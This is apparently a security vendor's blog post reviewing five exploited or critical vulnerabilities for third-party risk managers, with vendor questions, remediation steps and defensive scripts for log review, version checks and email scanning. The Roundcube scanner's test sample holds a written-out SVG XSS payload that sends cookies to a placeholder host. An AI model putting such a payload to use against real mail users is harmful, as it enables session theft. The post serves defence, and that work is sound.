FOCUS FRIDAY: ADDRESSING EXCHANGE SERVER RCE, FORTIMANAGER, GRAFANA, ROUNDCUBE WEBMAIL, AND CISCO FMC VULNERABILITIES FROM A TPRM PERSPECTIVE
Written by: Ferdi Gül
Welcome to this week’s edition of Focus Friday, where we explore high-profile cybersecurity incidents and vulnerabilities through the lens of Third-Party Risk Management (TPRM). In today’s rapidly evolving threat landscape, critical vulnerabilities pose a significant risk to organizations relying on third-party software and services. This week, we dive into several crucial vulnerabilities, including those affecting Exchange Server, FortiManager, Grafana, Roundcube Webmail, and Cisco FMC, each with potentially severe impacts on businesses. By leveraging Black Kite’s FocusTags™, TPRM professionals can gain key insights and stay ahead of these evolving threats.
Critical Microsoft Exchange Server RCE Vulnerabilities
What are the Microsoft Exchange Server RCE Vulnerabilities?
The Microsoft Exchange Server vulnerabilities in scope, CVE-2021-26855 above all, are critical Remote Code Execution (RCE) issues. CVE-2021-26855 is a server-side request forgery (SSRF) flaw that lets an unauthenticated attacker send arbitrary HTTP requests to the Exchange Server and authenticate as the server itself; on its own it yields access, and chained with the other flaws it yields code execution. CVE-2021-26857 is an insecure deserialization flaw in the Unified Messaging service, and CVE-2021-26858 and CVE-2021-27065 are post-authentication arbitrary file write flaws that let an attacker who has already passed the SSRF stage drop web shells, install malicious programs, and exfiltrate data. These vulnerabilities carry a high EPSS score; CVE-2021-26855 scores 97.5%, indicating a very high likelihood of exploitation in the wild.
First disclosed in early 2021, these vulnerabilities were rapidly exploited by multiple threat actors. Microsoft attributed the initial wave to the China-based group Hafnium, and the October 2024 reporting discussed below links Chinese state-sponsored activity, including the group tracked as Salt Typhoon, to attacks on critical infrastructure. Exploits have allowed attackers to plant backdoors, steal sensitive data, and compromise systems. Microsoft and several security agencies, including CISA, released advisories and urged immediate patching. CISA added CVE-2021-31196 to its KEV catalog on August 21, 2024; CVE-2021-34473 (ProxyShell) has been listed there since November 2021.
That reporting appeared in the Wall Street Journal (WSJ) on October 11, 2024, with further details published on the Chertoff Group website on October 18, 2024. The four CVEs discussed here (CVE-2021-26855, CVE-2021-27065, CVE-2021-26858, CVE-2021-26857) were added to the FocusTag scope earlier this week by Black Kite’s Research & Intelligence Team (BRITE). Clients tagged under this FocusTag who had already taken precautions against CVE-2021-31196 and CVE-2021-34473 are protected against these four as well, because a current cumulative update addresses all six. Security teams should nonetheless remain vigilant about CVE-2021-31196 and CVE-2021-34473, which we covered in our August 23, 2024 Focus Friday post.
Why Should TPRM Professionals Be Concerned?
From a third-party risk management perspective, these vulnerabilities pose significant risks to organizations that rely on Microsoft Exchange Server for communication and operational functions. A successful attack on Exchange Servers can lead to full system compromise, allowing attackers to access sensitive emails, contacts, and other communications. Additionally, the compromised server can be leveraged for further attacks, potentially spreading malware or stealing additional data from third-party vendors. Given the widespread use of Exchange Servers in enterprise environments, the ripple effects of such a breach can be substantial, especially when considering the possibility of fraudulent emails being sent from compromised accounts.
What Questions Should TPRM Professionals Ask Vendors About These Vulnerabilities?
- Have you applied the latest security updates to all affected versions of Exchange Server (2019 CU1 to CU8, 2016 CU8 to CU19, 2013 CU22, CU23, SP1, and 2010 SP3) to mitigate the risk of CVE-2021-31196, CVE-2021-34473, CVE-2021-26855, CVE-2021-27065, CVE-2021-26858, and CVE-2021-26857?
- Can you confirm that you have implemented strong security practices, including limiting access to the server, enabling multi-factor authentication, and regularly auditing access logs, to prevent potential exploitation of the Remote Code Execution (RCE) vulnerabilities in Microsoft Exchange Server?
- Are you actively monitoring network traffic to and from Exchange Server for any unusual activity that may indicate exploitation attempts related to CVE-2021-31196, CVE-2021-34473, CVE-2021-26855, CVE-2021-27065, CVE-2021-26858, and CVE-2021-26857?
- Given the critical nature of Exchange Server, have you undertaken proactive threat hunting to identify potential indicators of compromise related to the aforementioned CVEs?
Remediation Recommendations for Vendors
- Apply the Latest Security Updates. Microsoft has released security updates that address these vulnerabilities. Ensure that all affected Exchange Server installations are updated to the latest cumulative updates as listed above.
- Organizations are advised to prioritize patch management, strengthen authentication measures, and collaborate with ISPs to mitigate these evolving risks.
- Implement Strong Security Practices. Ensure that Exchange Server is properly configured with strong security settings, including limiting access to the server, enabling multi-factor authentication, and regularly auditing access logs.
- Consider Proactive Threat Hunting. Given the critical nature of Exchange Server, proactive threat hunting to identify potential indicators of compromise may be warranted.
- Monitor Network Traffic. Regularly monitor network traffic to and from Exchange Server for any unusual activity that may indicate exploitation attempts.
How TPRM Professionals Can Leverage Black Kite for These Vulnerabilities
Black Kite provides a streamlined approach for identifying vendors at risk of these vulnerabilities. The Exchange Server RCE FocusTag enables TPRM professionals to pinpoint vendors who have vulnerable Microsoft Exchange Servers in their environment. Black Kite helps operationalize this information by providing detailed asset intelligence, including IP addresses and subdomains, linked to the vendors. With this level of insight, TPRM teams can prioritize outreach and remediation efforts, ensuring that only vendors with exposure to these vulnerabilities are addressed. Black Kite first published this tag in August 2024 and most recently updated it on October 23, 2024, with new threat intelligence related to Chinese state-sponsored threat actors.
FortiManager: CVE-2024-47575 Missing Authentication Vulnerability
What is the FortiManager CVE-2024-47575 Vulnerability?
CVE-2024-47575 is a critical missing-authentication vulnerability in FortiManager, the system used to centrally manage Fortinet’s network security devices. Assigned a CVSS score of 9.8 and an EPSS score of 0.04% at the time of writing, it has been exploited in the wild since at least June 27, 2024. It allows unauthenticated attackers to execute arbitrary code or commands by sending specially crafted requests to the FortiManager fgfmd daemon, the service FortiGate devices use to register with the manager. Both on-premises FortiManager and FortiManager Cloud are affected, making this vulnerability a significant threat. On October 23, 2024, the vulnerability was added to CISA’s Known Exploited Vulnerabilities (KEV) catalog.
The vulnerability is actively exploited by the UNC5820 threat group, which has used it to steal configuration files, IP addresses, and credentials from FortiGate devices managed by FortiManager systems. This flaw poses a severe risk to organizations using FortiManager as it allows attackers to automate the exfiltration of sensitive information and potentially compromise their entire security infrastructure.
Why Should TPRM Professionals Be Concerned About the FortiManager Vulnerability?
Third-Party Risk Management (TPRM) professionals should be concerned because FortiManager is a critical tool for managing and securing network infrastructure. If compromised, attackers can gain access to sensitive configuration files and credentials for FortiGate devices, potentially leading to wider network breaches and unauthorized control of key network devices. The exposure of configuration details can lead to attackers disabling security defenses or manipulating device settings to bypass security measures. Additionally, the exploitation of this vulnerability could facilitate future attacks by providing attackers with the necessary information to escalate privileges or conduct lateral movements within the network.
As FortiManager is widely used by organizations to manage network security, the impact of this vulnerability could be devastating, particularly if sensitive information is exfiltrated and used to compromise other critical systems.
What Questions Should TPRM Professionals Ask Vendors About the FortiManager Vulnerability?
When assessing vendor exposure to CVE-2024-47575, TPRM professionals should ask:
- Has the vendor applied the latest firmware updates that address CVE-2024-47575?
- Are unregistered devices being blocked from connecting to the FortiManager system using the fgfm-deny-unknown configuration?
- Have all FortiGate device credentials been updated following the discovery of this vulnerability?
- Is the vendor actively monitoring FortiManager event logs for any suspicious activities, especially from unregistered devices like “localhost”?
Remediation Recommendations for Vendors subject to this risk
To mitigate the risks associated with CVE-2024-47575, vendors should:
- Apply firmware updates immediately. Ensure all FortiManager installations are updated to the latest secure versions (7.6.1, 7.4.5, 7.2.8, 7.0.13, 6.4.15, or above).
- Restrict device registrations by enabling fgfm-deny-unknown, which prevents unregistered devices from attempting to connect to FortiManager.
- Implement IP restrictions that limit fgfm access to trusted FortiGate addresses only, using a local-in policy (config system local-in-policy).
- Review FortiManager logs regularly for indicators of compromise (IoCs), including connections from unregistered devices or malicious IP addresses.
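The log review in the last step is the part a vendor can actually show you. The script below, an added example for this post rather than Fortinet’s or Black Kite’s code, parses FortiManager-style key="value" event log lines and flags device-manager entries that match the pattern described above: an unregistered device adding itself over fgfm, the advisory’s “localhost” device name, and registrations from addresses that are not the organization’s own FortiGates. The sample log lines and the trusted-address list are constructed for the example.

```python
"""Scan FortiManager event logs for the CVE-2024-47575 attack pattern: a
device that is not registered with the manager adding itself over the fgfm
channel, typically under the name "localhost" and from an address that is
not one of the organisation's FortiGates.

Added example for this post, not Fortinet's or Black Kite's code. The log
lines below are constructed to resemble FortiManager key="value" event
logs; the trusted FortiGate addresses are an assumption for the example.
"""
import re

TRUSTED_FORTIGATE_IPS = {"10.10.0.5", "10.10.0.6"}   # assumed management IPs
SUSPICIOUS_DEVICE_NAMES = {"localhost"}               # name called out in the advisory

# key=value pairs; values may be double-quoted and contain spaces.
KV_RE = re.compile(r'(\w+)=("(?:[^"\\]|\\.)*"|\S+)')

# Constructed sample: lines 1 and 3 carry the pattern, 2 and 4 are routine.
SAMPLE_LOGS = """\
type=event subtype=dvm level=notice user="device,..." msg="Unregistered device localhost add succeeded" device="localhost" adom="FortiManager" srcip=203.0.113.10 operation="Add device" performed_on="localhost"
type=event subtype=dvm level=notice user="admin" msg="Device FGT-BRANCH-01 add succeeded" device="FGT-BRANCH-01" adom="root" srcip=10.10.0.5 operation="Add device" performed_on="FGT-BRANCH-01"
type=event subtype=dvm level=notice user="device,..." msg="Unregistered device FGT-ROGUE add succeeded" device="FGT-ROGUE" adom="root" srcip=198.51.100.23 operation="Add device" performed_on="FGT-ROGUE"
type=event subtype=system level=information user="admin" msg="Login succeeded" srcip=10.10.0.50
"""


def parse_log_line(line):
    """Turn one key=value log line into a dict, dropping surrounding quotes."""
    fields = {}
    for key, raw in KV_RE.findall(line):
        fields[key] = raw[1:-1] if raw.startswith('"') else raw
    return fields


def classify(fields):
    """Reasons a device-manager entry looks like the CVE-2024-47575 pattern."""
    reasons = []
    if fields.get("subtype") != "dvm" or fields.get("operation") != "Add device":
        return reasons
    msg = fields.get("msg", "")
    device = fields.get("device", "")
    src = fields.get("srcip", "")
    if msg.startswith("Unregistered device"):
        reasons.append("unregistered device registered itself over fgfm")
    if device.lower() in SUSPICIOUS_DEVICE_NAMES:
        reasons.append(f"device name {device!r} matches the advisory's indicator")
    if src and src not in TRUSTED_FORTIGATE_IPS:
        reasons.append(f"registration came from untrusted source {src}")
    return reasons


def scan(log_text):
    """Return (line number, device name, reasons) for every flagged entry."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        fields = parse_log_line(line)
        reasons = classify(fields)
        if reasons:
            hits.append((lineno, fields.get("device", "?"), reasons))
    return hits


if __name__ == "__main__":
    for lineno, device, reasons in scan(SAMPLE_LOGS):
        print(f"line {lineno}: device={device}")
        for reason in reasons:
            print("  -", reason)
```

A hit on the “unregistered device” reason means the fgfm-deny-unknown workaround was not in place when the entry was written; on the FortiManager CLI that setting lives under config system global (set fgfm-deny-unknown enable), and any such hit should trigger the credential rotation the questions above ask about.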
How Can TPRM Professionals Leverage Black Kite for This Vulnerability?
Black Kite published the FocusTag™ on October 23, 2024, identifying CVE-2024-47575 as a significant threat due to its active exploitation in the wild. TPRM professionals can operationalize this tag by using Black Kite’s insights to determine which of their vendors may be exposed to this vulnerability. Black Kite provides asset information such as IP addresses and subdomains that may be at risk, allowing organizations to pinpoint which vendors may need to implement remediation steps. The tag was most recently updated with information about ongoing threat activity by the UNC5820 group, ensuring TPRM professionals stay informed as new details emerge.
CVE-2024-9264 and Grafana RCE Vulnerability
What is the Grafana RCE Vulnerability?
CVE-2024-9264 is a critical Remote Code Execution (RCE) vulnerability affecting Grafana, a popular open-source platform used for monitoring and observability. It carries a CVSS score of 9.9. First disclosed in October 2024, the flaw lies in SQL Expressions, an experimental feature that remained reachable even when its feature flag was not enabled, because the flag was not enforced correctly. The feature passes user-supplied SQL to DuckDB without adequate sanitization, so an attacker can run arbitrary DuckDB queries, including DuckDB’s file-reading functions, which exposes arbitrary files on the host and can lead to full system compromise.
While widespread exploitation has not yet been observed, the existence of a public proof of concept (PoC) raises the likelihood of attacks. Exploitation requires the DuckDB binary to be present on the PATH of the Grafana server process; Grafana does not ship it, so an instance is only exploitable where DuckDB has been installed separately. Where it is present, attackers could read sensitive files such as /etc/passwd or retrieve environment variables, which often contain secrets. As of this writing, the vulnerability has not been added to CISA’s Known Exploited Vulnerabilities catalog.
Why Should TPRM Professionals Be Concerned?
From a TPRM perspective, CVE-2024-9264 presents serious risks to organizations using Grafana. Since Grafana is commonly deployed to monitor critical infrastructure, any compromise could lead to the exposure of sensitive data, such as operational logs or system configurations. Moreover, if an attacker gains control of the Grafana instance, they can potentially pivot to other parts of the network, launching further attacks. Given that any user with Viewer permissions can exploit this vulnerability, organizations using Grafana may unknowingly expose themselves to insider threats or unauthorized access by users with minimal privileges.
What Questions Should TPRM Professionals Ask Vendors About the Grafana RCE Vulnerability?
- Have you upgraded your Grafana instances to one of the patched versions (v11.0.5+security-01, v11.1.6+security-01, v11.2.1+security-01, v11.0.6+security-01, v11.1.7+security-01, v11.2.2+security-01) to mitigate the risk of CVE-2024-9264?
- Can you confirm if the DuckDB binary has been removed from the system’s PATH or uninstalled entirely to prevent exploitation of the CVE-2024-9264 vulnerability?
- Have you implemented measures to regularly review system logs for suspicious activity, specifically related to potential exploitation of the SQL Expressions feature in Grafana?
- Can you confirm if you have implemented proper access controls for users with Viewer permissions or higher to prevent unauthorized exploitation of the SQL Expressions feature in Grafana?
Remediation Recommendations for Vendors
- Immediately upgrade Grafana to a patched version, such as v11.0.5+security-01, v11.1.6+security-01, or the latest v11.2.2+security-01, to prevent exploitation.
- If a patch cannot be applied right away, remove or uninstall the DuckDB binary from the system to mitigate the risk.
- Regularly audit system logs and monitor access control for any unusual activity involving Grafana users with Viewer permissions or higher.
- Follow Grafana Labs’ security announcements for any additional updates or mitigations related to this vulnerability.
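The two checks in the first two steps, the exact build string and the DuckDB binary, are easy to get wrong: a version string without the +security-01 build metadata is still vulnerable even though the numeric part matches. The script below is an added example for this post, not Grafana Labs’ code. The patched releases are the ones listed above; treating releases newer than the highest patched build on an affected minor line as fixed, and treating 10.x and 11.3+ as out of scope, are assumptions of this example.

```python
"""Assess a Grafana server for CVE-2024-9264: is the build one of the
patched releases, and is the DuckDB binary (which the exploit needs)
reachable on PATH?

Added example for this post, not Grafana Labs' own code. The patched
versions are the ones quoted in the post; treating releases newer than
the highest patched build on an affected minor line as fixed, and
treating 10.x and 11.3+ as out of scope, are assumptions of this example.
"""
import re
import shutil
import sys

# Patched releases named in the advisory. The "+security-01" build metadata
# matters: plain 11.2.1 is vulnerable, 11.2.1+security-01 is not.
PATCHED = {
    "11.0.5+security-01", "11.0.6+security-01",
    "11.1.6+security-01", "11.1.7+security-01",
    "11.2.1+security-01", "11.2.2+security-01",
}
# Minor lines that shipped the unguarded SQL Expressions feature.
AFFECTED_LINES = {(11, 0), (11, 1), (11, 2)}

VERSION_RE = re.compile(
    r"^v?(\d+)\.(\d+)\.(\d+)"          # major.minor.patch
    r"(?:-([0-9A-Za-z.-]+))?"          # optional pre-release, e.g. -pre
    r"(?:\+([0-9A-Za-z.-]+))?$"        # optional build metadata, e.g. +security-01
)


def parse_version(text):
    """Split a Grafana version string into (major, minor, patch, pre, build)."""
    match = VERSION_RE.match(text.strip())
    if not match:
        raise ValueError(f"unrecognised Grafana version: {text!r}")
    major, minor, patch, pre, build = match.groups()
    return int(major), int(minor), int(patch), pre, build


def highest_patched_on_line(major, minor):
    """Highest patch number among PATCHED releases on the given minor line."""
    prefix = f"{major}.{minor}."
    return max(parse_version(v)[2] for v in PATCHED if v.startswith(prefix))


def is_vulnerable(text):
    """True if the version is on an affected line and is not a patched build."""
    major, minor, patch, _pre, build = parse_version(text)
    if (major, minor) not in AFFECTED_LINES:
        return False  # assumption: lines outside the advisory list are out of scope
    canonical = f"{major}.{minor}.{patch}" + (f"+{build}" if build else "")
    if canonical in PATCHED:
        return False
    # A build at or below the highest patched number that lacks the security
    # metadata is treated as unpatched (conservative); anything newer as fixed.
    return patch <= highest_patched_on_line(major, minor)


def duckdb_on_path():
    """The exploit only reaches file reads if Grafana can spawn `duckdb`."""
    return shutil.which("duckdb") is not None


def assess(version_text):
    """Return a short verdict combining the version check and the DuckDB check."""
    if not is_vulnerable(version_text):
        return "patched"
    if duckdb_on_path():
        return "vulnerable and exploitable: DuckDB is on PATH, upgrade now"
    return "vulnerable build; DuckDB absent limits impact, but upgrade anyway"


if __name__ == "__main__":
    # Usage: python grafana_cve_2024_9264.py 11.2.1  (run on the Grafana host)
    print(assess(sys.argv[1] if len(sys.argv) > 1 else "11.2.1"))
```

Run it on the Grafana host itself, as the user the Grafana service runs as, so that the PATH checked is the one the server process actually sees; a DuckDB binary visible to an administrator’s shell but not to the service account does not enable the exploit, and the reverse is the case that matters.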
How Can TPRM Professionals Leverage Black Kite for This Vulnerability?
Black Kite helps TPRM professionals determine which vendors are vulnerable to this critical Grafana RCE vulnerability. The FocusTag™ for Grafana enables users to identify vendors who are potentially exposed by flagging related assets, including IP addresses and subdomains. With this actionable intelligence, TPRM teams can prioritize communications with affected vendors, ensuring timely remediation efforts. This tag was published by Black Kite on October 18, 2024, and ongoing updates are provided as new information becomes available.
CVE-2024-37383 and Roundcube Webmail XSS Vulnerability
What is the Roundcube Webmail XSS Vulnerability?
CVE-2024-37383 is a medium-severity Cross-Site Scripting (XSS) vulnerability impacting Roundcube Webmail. This vulnerability, with a CVSS score of 6.1 and an EPSS score of 0.05%, allows attackers to inject and execute arbitrary JavaScript within the victim’s web browser. It was patched in May 2024 in Roundcube 1.5.7 and 1.6.7; in October 2024 it was reported that unknown threat actors had exploited it to steal user credentials by embedding malicious SVG animate attributes in emails. Once the victim opened the email in an unpatched Roundcube, the embedded script exfiltrated login credentials to an external server. It is currently not clear who is behind the exploitation activity, although prior flaws discovered in Roundcube have been abused by multiple hacking groups such as APT28, Winter Vivern, and TAG-70. CISA added it to the Known Exploited Vulnerabilities (KEV) catalog on October 24, 2024, after Black Kite had already tagged it.
Why Should TPRM Professionals Be Concerned?
From a TPRM perspective, this XSS vulnerability in Roundcube Webmail poses a significant risk to organizations that rely on this platform for email services. Exploitation of this vulnerability can lead to credential theft, allowing attackers to gain unauthorized access to sensitive accounts, potentially compromising email communications and exposing confidential information. Furthermore, the ability to execute malicious code via emails makes it a potent vector for phishing attacks, putting both vendors and their partners at risk. Email remains a critical component of most business operations, and any breach in this system can have far-reaching consequences, including reputational damage and regulatory scrutiny.
What Questions Should TPRM Professionals Ask Vendors About the Roundcube Webmail XSS Vulnerability?
- Have you updated your Roundcube Webmail instances to the patched versions (1.5.7 or 1.6.7) that address CVE-2024-37383?
- What measures have you implemented to detect and mitigate phishing attacks targeting email clients like Roundcube?
- Can you confirm if you have implemented email filtering tools to block malicious attachments and scripts within emails as recommended in the advisory?
- Have you enabled multi-factor authentication (MFA) on all critical systems to mitigate credential theft risks associated with this vulnerability?
- Have you reviewed your email logs for any suspicious login activities or interactions with known malicious domains, such as ‘libcdn[.]org’?
Remediation Recommendations for Vendors
- Upgrade Roundcube Webmail to versions 1.5.7 or 1.6.7 to patch the XSS vulnerability and mitigate the risk of credential theft.
- Educate employees on how to identify and avoid phishing emails, with an emphasis on recognizing suspicious attachments or links.
- Implement multi-factor authentication (MFA) across all critical systems to reduce the likelihood of unauthorized access through stolen credentials.
- Conduct a thorough audit of Roundcube logs for any indicators of compromise (IoCs) related to this vulnerability or phishing attacks.
- Use email filtering tools to block potentially malicious content, such as scripts or SVG files, embedded within emails.
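The last recommendation is concrete enough to show. The scanner below is an added example for this post, not Roundcube’s own washtml sanitizer: it walks the HTML of a message body and flags the SVG animation markup described above (an animate-type element, especially one that rewrites an href at render time) together with script-scheme URLs and inline event handlers in any attribute. The two sample messages are constructed, and the exfiltration host in the malicious one is a placeholder.

```python
"""Scan an HTML email body for SVG animation markup of the kind abused in the
CVE-2024-37383 campaign against Roundcube Webmail, where an <animate>
element rewrote an attribute into a script URL once the message rendered.

Added example for this post, not Roundcube's own washtml sanitizer. The two
sample messages are constructed; the exfiltration host is a placeholder.
"""
from html.parser import HTMLParser

# SVG elements that change another attribute at render time.
SVG_ANIMATION_TAGS = {"animate", "animatetransform", "animatemotion", "set"}
# URL schemes that execute script when used as a link or resource target.
SCRIPT_SCHEMES = ("javascript:", "vbscript:", "data:text/html")


class SvgAnimateScanner(HTMLParser):
    """Collect findings; HTMLParser lower-cases tag and attribute names, so
    ANIMATE / attributeName / AttributeName all land on the same checks."""

    def __init__(self):
        super().__init__()
        self.findings = []
        self._svg_depth = 0

    def handle_starttag(self, tag, attrs):
        attrs = {name.lower(): (value or "") for name, value in attrs}
        if tag == "svg":
            self._svg_depth += 1
        if tag in SVG_ANIMATION_TAGS:
            where = " inside <svg>" if self._svg_depth else ""
            self.findings.append(f"<{tag}> element{where}")
            target = attrs.get("attributename", "")
            if target.lower() in ("href", "xlink:href"):
                self.findings.append(f"<{tag}> rewrites {target} at render time")
        for name, value in attrs.items():
            # Drop all whitespace so a split-up scheme cannot hide from the match.
            compact = "".join(value.split()).lower()
            if any(scheme in compact for scheme in SCRIPT_SCHEMES):
                self.findings.append(f"<{tag}> {name} carries a script URL")
            if name.startswith("on"):
                self.findings.append(f"<{tag}> {name} event handler attribute")

    def handle_endtag(self, tag):
        if tag == "svg" and self._svg_depth:
            self._svg_depth -= 1


def scan_email_html(html_body):
    """Return the list of findings for one HTML body (empty means nothing flagged)."""
    scanner = SvgAnimateScanner()
    scanner.feed(html_body)
    scanner.close()
    return scanner.findings


# Constructed samples: a benign message and one carrying the pattern.
BENIGN = (
    '<html><body><p>Hi,</p>'
    '<img src="https://cdn.example/logo.png" alt="logo"></body></html>'
)
MALICIOUS = (
    '<html><body><p>Please review the attached statement.</p>'
    '<svg xmlns="http://www.w3.org/2000/svg"><a>'
    '<animate attributeName="href" values="javascript:fetch(\'https://exfil.example/?c=\'+document.cookie)" begin="0s"/>'
    '<text x="10" y="20">Open statement</text></a></svg></body></html>'
)

if __name__ == "__main__":
    for label, body in (("benign", BENIGN), ("malicious", MALICIOUS)):
        findings = scan_email_html(body)
        print(f"{label}: {'clean' if not findings else ''}")
        for finding in findings:
            print("  -", finding)
```

A gateway rule built on this should quarantine rather than merely log, since the whole point of the campaign was that the victim only had to open the message; and it is a filter-layer complement to patching, not a substitute, because the sanitizer that actually matters is the one inside Roundcube 1.5.7 / 1.6.7.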
How Can TPRM Professionals Leverage Black Kite for This Vulnerability?
Black Kite’s FocusTag™ for Roundcube Webmail enables TPRM professionals to identify vendors using vulnerable versions of Roundcube. By providing detailed asset information, including IP addresses and subdomains associated with vendors, Black Kite allows TPRM teams to target remediation efforts where they are most needed. This FocusTag was published on October 24, 2024, and ongoing updates are available to ensure that TPRM professionals stay informed about the latest exploitation trends and mitigations related to this vulnerability.
CVE-2024-20424 and Cisco FMC Command Injection Vulnerability
What is the Cisco FMC Command Injection Vulnerability?
CVE-2024-20424 is a critical command injection vulnerability in Cisco Secure Firewall Management Center (FMC) Software, with a CVSS score of 9.9. This vulnerability arises from insufficient input validation in the web-based management interface of the software. Exploiting this flaw allows authenticated remote attackers to execute arbitrary commands with root privileges, potentially compromising the entire system. The vulnerability was first disclosed in October 2024, and although no active exploitation has been reported yet, the critical nature of this flaw makes it a priority for patching.
Attackers could exploit this vulnerability using credentials from a low-privileged account, such as a Security Analyst (Read Only), to escalate privileges and run high-level commands. This could result in unauthorized modifications, malware installation, or disabling critical security defenses. While there is no PoC available yet, the risk posed by this vulnerability is significant, particularly for organizations heavily relying on Cisco FMC software for managing their firewalls.
Why Should TPRM Professionals Be Concerned?
For third-party risk management (TPRM) professionals, this vulnerability presents a significant risk to organizations using Cisco FMC software. Compromising this system would allow attackers to control network security policies, firewall settings, and other critical functions, leading to potential unauthorized access across the network. Cisco FMC is often used to manage firewalls, and any disruption or control takeover could result in network breaches, exposure of sensitive data, and operational disruption. The criticality of CVE-2024-20424 makes it essential for TPRM professionals to ensure that their vendors and partners using Cisco FMC have properly mitigated this vulnerability.
What Questions Should TPRM Professionals Ask Vendors About the Cisco FMC Command Injection Vulnerability?
- Have you applied Cisco’s latest software updates that address CVE-2024-20424 and CVE-2024-20379 in Cisco FMC?
- Can you confirm if you have restricted access to the web-based management interface of Cisco FMC Software to trusted users only, as a measure to prevent potential exploitation of CVE-2024-20424 and CVE-2024-20379?
- Have you implemented multi-factor authentication (MFA) for user accounts, especially for low-level user accounts such as Security Analyst (Read Only), to prevent privilege escalation and execution of highly privileged commands as a result of CVE-2024-20424?
- Are you monitoring network activity for unusual behavior indicative of potential exploitation of the command injection vulnerability (CVE-2024-20424) and the improper input validation vulnerability (CVE-2024-20379) in Cisco FMC Software?
Remediation Recommendations for Vendors
- Immediately apply the latest software patches released by Cisco to address CVE-2024-20424 and CVE-2024-20379.
- Implement multi-factor authentication (MFA) for all users accessing Cisco FMC to mitigate unauthorized access risks.
- Restrict access to the Cisco FMC web-based management interface to trusted IP addresses and users only.
- Regularly monitor network traffic and logs for any suspicious activity or indicators of compromise.
- Follow Cisco’s official advisory for further instructions and guidance on securing Cisco FMC software.
How Can TPRM Professionals Leverage Black Kite for This Vulnerability?
Black Kite’s FocusTag™ for Cisco FMC provides a comprehensive view of which vendors are potentially exposed to these vulnerabilities. This tag allows TPRM professionals to pinpoint which of their third-party vendors or partners are using vulnerable Cisco FMC versions. By leveraging Black Kite’s asset intelligence, such as associated IP addresses and subdomains, TPRM teams can focus their remediation efforts on the vendors that pose the highest risk. Black Kite published this FocusTag on October 24, 2024, and it will be updated as new details or patches are released by Cisco.
Maximizing TPRM Effectiveness with Black Kite’s FocusTags™
Black Kite’s FocusTags™ are vital tools for enhancing Third-Party Risk Management strategies, offering targeted insights that help organizations mitigate risks more efficiently. These tags, especially when dealing with vulnerabilities in Exchange Server, FortiManager, Grafana, Roundcube Webmail, and Cisco FMC, provide:
- Real-Time Risk Identification: Immediate recognition of vendors impacted by critical vulnerabilities, facilitating prompt and decisive action.
- Risk Prioritization: By assessing vendor importance and vulnerability severity, TPRM professionals can focus on the most critical issues first, ensuring resources are used effectively.
- Informed Vendor Engagement: Black Kite’s FocusTags™ empower organizations to hold informed, meaningful conversations with vendors about their security posture and remediation efforts, specifically addressing exposure to identified vulnerabilities.
- Strengthened Cybersecurity Posture: These tags offer a comprehensive overview of the threat landscape, enabling organizations to enhance their overall cybersecurity strategies, improving their resilience against future threats.
By transforming complex threat data into actionable intelligence, Black Kite’s FocusTags™ streamline the risk management process, enabling TPRM professionals to respond swiftly to emerging vulnerabilities and ensure the safety of their third-party ecosystem.
Want to take a closer look at FocusTags™?
Take our platform for a test drive and request a demo today.
About Focus Friday
Every week, we delve into the realms of critical vulnerabilities and their implications from a Third-Party Risk Management (TPRM) perspective. This series is dedicated to shedding light on pressing cybersecurity threats, offering in-depth analyses, and providing actionable insights.
FocusTags™ in the Last 30 Days:
- Exchange Server RCE: CVE-2021-26855, CVE-2021-27065, CVE-2021-26858, CVE-2021-26857, Remote Code Execution Vulnerability in Exchange Server.
- FortiManager: CVE-2024-47575, Missing Authentication Vulnerability in FortiManager.
- Grafana: CVE-2024-9264, Remote Code Execution Vulnerability in Grafana.
- Roundcube Webmail: CVE-2024-37383, Cross-Site Scripting (XSS) Vulnerability in Roundcube Webmail.
- Cisco FMC: CVE-2024-20424, Command Injection Vulnerability in Cisco Secure Firewall Management Center.
- Oracle WebLogic Server: CVE-2024-21216, Remote Code Execution Vulnerability in Oracle WebLogic Server.
- GitHub Enterprise: CVE-2024-9487, SAML SSO Authentication Bypass Vulnerability in GitHub Enterprise Server.
- Fortinet Core Products: CVE-2024-23113, Format String Vulnerability in FortiOS, FortiPAM, FortiProxy, and FortiWeb.
- Cisco RV Routers: CVE-2024-20393, CVE-2024-20470, Privilege Escalation and RCE Vulnerability in RV340, RV340W, RV345, and RV345P Dual WAN Gigabit VPN Routers.
- Ivanti Connect Secure: CVE-2024-37404, Remote Code Execution Vulnerability in Ivanti Connect Secure & Policy Secure.
- Zimbra: CVE-2024-45519, Remote Command Execution Vulnerability in Zimbra.
- DrayTek Routers: CVE-2020-15415, Remote Code Execution Vulnerability in DrayTek Vigor Routers.
- Authentik: CVE-2024-47070, Authentication Bypass Vulnerability in Authentik.
- Octopus Deploy: CVE-2024-9194, SQL Injection Vulnerability in Octopus Server.
- pgAdmin: CVE-2024-9014, OAuth2 Authentication Vulnerability in pgAdmin.
- Keycloak: CVE-2024-8698, CVE-2024-8883, SAML Signature Validation Bypass and Session Hijacking Vulnerability in Keycloak.
- Navidrome: CVE-2024-47062, SQL Injection Vulnerability in Navidrome.
- PAN-OS Cleartext: CVE-2024-8687, Cleartext Exposure Security Flaw in PAN-OS, GlobalProtect, Prisma Access.
- FileCatalyst Workflow: CVE-2024-6633, CVE-2024-6632, Insecure Default Configuration and SQL Injection Vulnerability in Fortra FileCatalyst Workflow.
- WPML: CVE-2024-6386, Critical Remote Code Execution Vulnerability via Twig Server-Side Template Injection in WPML Plugin
- SonicWall Firewalls: CVE-2024-40766, Critical Improper Access Control Vulnerability in SonicWall Firewalls
References
https://chertoffgroup.com/china-based-cyber-attacks-highlight-us-tech-vulnerability
https://nvd.nist.gov/vuln/detail/CVE-2021-26855
https://nvd.nist.gov/vuln/detail/CVE-2021-27065
https://nvd.nist.gov/vuln/detail/CVE-2021-26858
https://nvd.nist.gov/vuln/detail/CVE-2021-26857
https://nvd.nist.gov/vuln/detail/CVE-2024-47575
https://fortiguard.fortinet.com/psirt/FG-IR-24-423
https://nvd.nist.gov/vuln/detail/CVE-2024-9264
https://github.com/nollium/CVE-2024-9264/tree/main
https://grafana.com/blog/2024/10/17/grafana-security-release-critical-severity-fix-for-cve-2024-9264
https://grafana.com/security/security-advisories/cve-2024-9264
https://github.com/advisories/GHSA-q99m-qcv4-fpm7
https://nvd.nist.gov/vuln/detail/CVE-2024-37383
https://thehackernews.com/2024/10/hackers-exploit-roundcube-webmail-xss.html
https://github.com/roundcube/roundcubemail/releases/tag/1.6.7